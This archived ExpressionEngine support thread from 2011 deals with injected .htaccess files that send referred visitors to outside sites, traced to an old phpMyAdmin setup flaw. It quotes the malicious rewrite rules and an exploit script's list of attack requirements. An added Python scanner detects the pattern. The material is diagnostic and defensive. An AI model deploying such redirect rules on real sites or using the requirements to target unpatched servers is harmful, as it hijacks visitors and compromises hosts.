ExpressionEngine CMS
This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


EE 1.6.9 exploit or phpMyadmin exploit?

January 14, 2011 3:59pm

  • #1 / Jan 14, 2011 3:59pm

    hwalker

    17 posts

    Hello,

    A client site running 1.6.9 started getting pages redirected to google.com about three weeks ago.

    I found a slew of new .htaccess files littered through the site. They were causing the redirects to Google. The behavior and timing of this exploit matched exactly what is discussed in this Google webmaster forum:

    http://www.google.com/support/forum/p/Webmasters/thread?tid=64fe7d9a9e90fe96&hl=en

    The consensus on this forum is that this is php code injection targeting insecure installations of phpMyAdmin: http://forum.hackforce.ru/showthread.php?t=444

    So I removed all the malicious .htaccess files. Two weeks later they reappeared, and I deleted them again. Yesterday, it happened again, this time the .htaccess files were a little different, instead redirecting to yagizmo.com, a known attack site. Here is what yesterday’s .htaccess files looked like:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://yagizmo.com/%{REMOTE_ADDR}

    Meanwhile, I’ve been talking with my client’s host (aiso.net). My problem is they insist that their installation of phpMyAdmin is not the problem, but the cms is. Below is their latest response. (I find it interesting that they blame the “cms”, not sure if they know what cms they’re blaming):

    We have already looked at phpmyadmin and that is not the issue. phpmyadmin does NOT let you upload htaccess files. It only manages the database. This is 100% an exploit in the cms, and if all htaccess files are not removed and the latest version of the software is not installed, it will be just a matter of time before it gets infected again. That is because it comes in through port 80, which can not be blocked.

    Would you like us to clean your site and update it?

    I find their response questionable, since my understanding is that the htaccess files are generated by the malware, which got in possibly through phpMyAdmin. It seems silly to suggest that someone or something is literally “uploading” htaccess files through phpMyAdmin. Also I don’t think htaccess files can regenerate themselves since they’re not executable. Some software on the server would be generating these, right?

    I’ve removed the malicious .htaccess files three times in the last month. It’s starting to feel like Whack-a-Mole.

    Back to EE, I saw that version 1.7.0 includes this in the changelog:

    * Fixed a security issue that in certain circumstances could result in arbitrary code execution.

    I’d really appreciate some advice on whether the host is right and this could be an exploit targeting 1.6.9, or is phpMyAdmin the culprit and the host is just being lazy?

    The client is willing to update to 1.7.0 if that’s the solution, but would rather not (we’re in the middle of a rebuild) if this won’t stop these recurring exploits.

    Any help or suggestions would be most appreciated.

    Thanks!

  • #2 / Jan 14, 2011 7:33pm

    Sue Crocker

    26054 posts

    hwalker:

      Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

      1. EE version and build (found at the bottom of your control panel)
      2. Other scripts on your account, whether in use or not (phpBB, etc…)*

      * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

      While we work through this, please check through these files:

      * path.php
      * config.php
      * index.php

      to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

      You may also wish to refresh your files by following the build update instructions.

      Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

    The only thing that writes to the .htaccess file is the Blacklist/Whitelist. Are you using that?

  • #3 / Jan 15, 2011 4:06pm

    earthisland

    46 posts

    Hello,
    I am experiencing this same problem. I had deleted the bad .htaccess files several times since 20 December, mostly from image directories; after doing that yet again this morning I found two in subdirectories of /system/cache/page_cache that wouldn’t allow me to delete them. So I used the control panel to purge the caches, and all the others reappeared. Nothing strange in my index, config, or path files. Thanks for looking into this!

  • #4 / Jan 16, 2011 3:21pm

    Greg Salt

    3988 posts

    Hi earthisland,

    Thanks for reporting this. As Sue has posted above, please do notify your host as soon as possible and let us know:

    Which version and build of EE are you using?
    Which other scripts exist in your account, whether in use or not (phpBB, etc…)
    Is the Blacklist/Whitelist module installed and active?

    You may also wish to refresh your files by following the build update instructions.

    Cheers

    Greg

  • #5 / Jan 17, 2011 1:56pm

    hwalker

    17 posts

    Hi all,

    I had been in communication with the host about this, and after several denials they’ve tacitly admitted the exploit is through phpMyAdmin. Here’s their latest reply:

    I took a look at the articles you sent us. One of the versions that was listed matches the version we are running on the older server, so I will forward this on to a senior tech who will look into this further, see if they can find any information on whether this is how they got into your site, and upgrade the php version to be safe.

    The new server you are on is a higher version than the exploit can work on, so your site should be safe on the new server.

    Have a great day.

    They don’t directly say it or confirm, but it seems, as I suspected, that EE is not the problem here. A bit annoying how they reflexively blame the cms without doing their research first!

    Anyone experiencing this problem should find out from their host if phpMyAdmin on their server is one of the older vulnerable versions. Here are some details:

    # attack requirements:
    # 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
    # and 3.x before 3.1.3.1 according to PMASA-2009-3
    # 2) it *seems* this vuln can only be exploited against environments
    # where the administrator has chosen to install phpMyAdmin following
    # the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
    # 3) administrator must have NOT deleted the '/config/' directory
    # within the '/phpMyAdmin/' directory. this is because this directory is
    # where '/scripts/setup.php' tries to create 'config.inc.php' which is where
    # our evil PHP code is injected 8)
    
    # more info on:
    # http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
    # http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/


    Sue and Greg, I’ve not bothered to give you the build and other requested details, since I’m pretty confident this is not an EE issue.

    Thanks!!

  • #6 / Jan 17, 2011 3:04pm

    Brandon Jones

    5500 posts

    Thanks hwalker,

    Please keep us posted on any further developments.

    earthisland,

    To clarify, you are saying that .htaccess files are immediately appearing in your writeable image directories after clearing caches from the EE control panel? Can you post the contents of the “bad” .htaccess files that are created?

  • #7 / Jan 18, 2011 4:16pm

    earthisland

    46 posts

    Hi,
    I’m on 1.69, Build: 20100430
    The .htaccess files appeared spontaneously the first several times, usually about 5 days apart. After removing them last week, I used the EE control panel to flush the cache, and the files reappeared.

    The contents of the file were staying the same as far as I could tell, so I stopped looking at them—I’m now curious as to whether the most recent version (Friday last) was different.

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

    I think that in the case of .htaccess files that already existed it just added these lines. The address isn’t valid. In my case, the files were added only to directories that were serving images out of posts. This had the effect of showing the text, but delivering a 404 for the image.

    I have been working with my host, who likewise want me to move to a new server. Because of charset issues, this is a pain, but it will work at least if they’ve updated their phpMyAdmin version.
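
Added example (not from this thread or from ExpressionEngine): a small scanner for the referer-gated external redirect pattern in the two .htaccess bodies posted above, walking a site tree for stray .htaccess files like the ones found in image and cache directories. The sample files are constructed from the posted rules, and `example.com` stands in for the site's own hostname.

```python
import re
import tempfile
from pathlib import Path
# Constructed samples: the injected rule set quoted in this thread and a benign rewrite.
INJECTED = """RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://yagizmo.com/%{REMOTE_ADDR}
"""
BENIGN = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /index.php/$1 [L]
"""
ABS_URL = re.compile(r"^https?://([^/\s]+)", re.I)

def suspicious_redirects(text, own_hosts=()):
    """Return external redirect targets whose RewriteRule is gated on HTTP_REFERER."""
    # Apache applies the RewriteCond lines directly above a RewriteRule to that rule.
    hits, conds = [], []
    for raw in text.splitlines():
        parts = raw.strip().split()
        kw = parts[0].lower() if parts else ""
        if kw == "rewritecond" and len(parts) >= 3:
            conds.append(parts[1])
        elif kw == "rewriterule" and len(parts) >= 3:
            target, m = parts[2], ABS_URL.match(parts[2])
            referer_gated = any("HTTP_REFERER" in c.upper() for c in conds)
            if m and m.group(1).lower() not in own_hosts and referer_gated:
                hits.append(target)
            conds = []  # conditions are consumed by the rule they precede
    return hits

def scan_tree(root, own_hosts=()):
    """Map each .htaccess under root to its suspicious redirect targets."""
    findings = {}
    for path in Path(root).rglob(".htaccess"):
        hits = suspicious_redirects(path.read_text(errors="replace"), own_hosts)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Lay the constructed samples out like a site tree and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "images" / "uploads").mkdir(parents=True)
    (root / ".htaccess").write_text(BENIGN)
    (root / "images" / "uploads" / ".htaccess").write_text(INJECTED)
    return scan_tree(root, own_hosts={"example.com"})

if __name__ == "__main__":
    print(demo())
```

Run it against a real document root with `scan_tree("/path/to/site", own_hosts={"your-site.example"})`; a clean tree returns an empty dict.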

  • #8 / Jan 19, 2011 9:22am

    Sue Crocker

    26054 posts

    Thanks for posting the additional information.

    Let us know what happens after you move the site to another server. (Personally, I’d take the opportunity to move to EngineHosting. 😊 )

  • #9 / Mar 15, 2011 8:29pm

    earthisland

    46 posts

    So everyone isn’t left hanging, I did move the site to another server (on the same host), and all seems well. Thanks for your help.

  • #10 / Mar 16, 2011 10:13am

    Mark Bowen

    12637 posts

    Myself personally, if my host told me porkies like that I’d not move to another server with them, I’d completely leave them outright.

    If your host doesn’t know what’s going on with their own machines then your data is not safe. That’s the way I look at it anyway.

    Glad it’s all sorted now and glad they came clean (in a roundabout sort of way), but I would still seriously consider moving host myself.

    Best wishes,

    Mark

  • #11 / Mar 16, 2011 5:11pm

    Sue Crocker

    26054 posts

    earthisland, glad your issues appear to be resolved. Feel free to start a new thread if you have any more questions.

